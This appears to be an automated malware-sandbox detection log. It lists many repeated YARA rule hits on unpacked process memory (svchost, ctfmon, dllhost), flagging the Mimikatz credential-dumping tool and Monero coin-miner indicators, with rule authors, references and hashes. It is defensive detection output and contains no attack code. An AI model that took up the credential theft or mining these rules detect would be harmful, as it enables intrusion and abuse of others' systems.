      Source: 2.3.svchost.exe.4f42c68.39.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 21.0.SearchProtocolHost.exe.2fa0000.3.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 16.0.dllhostex.exe.1290000.3.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
      Source: 16.0.dllhostex.exe.1290000.3.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: 16.0.dllhostex.exe.1290000.3.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 2.3.svchost.exe.5780000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f37468.50.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 33.0.ctfmon.exe.7c7468.4.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f42c68.30.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 29.2.svchost.exe.8e2c68.2.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 23.0.dllhost.exe.2860000.3.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f00000.16.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 35.0.svchost.exe.862c68.5.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b42000.19.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f42c68.56.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 35.0.svchost.exe.862c68.5.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f00000.55.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f42c68.51.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f37468.7.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f42c68.33.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 32.0.ctfmon.exe.787468.1.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f00000.37.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 35.2.svchost.exe.857468.1.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f37468.32.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 15.0.ctfmon.exe.997468.5.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 27.0.svchost.exe.517468.1.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f42c68.44.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 16.2.dllhostex.exe.1290000.0.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
      Source: 16.2.dllhostex.exe.1290000.0.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: 16.2.dllhostex.exe.1290000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 2.3.svchost.exe.4f42c68.56.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 23.0.dllhost.exe.2897468.1.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 35.2.svchost.exe.820000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 24.0.dllhost.exe.2e37468.4.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 24.0.dllhost.exe.2e42c68.2.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 15.2.ctfmon.exe.997468.2.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f37468.57.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b42000.58.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f42c68.30.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f00000.22.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 16.0.dllhostex.exe.1290000.1.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
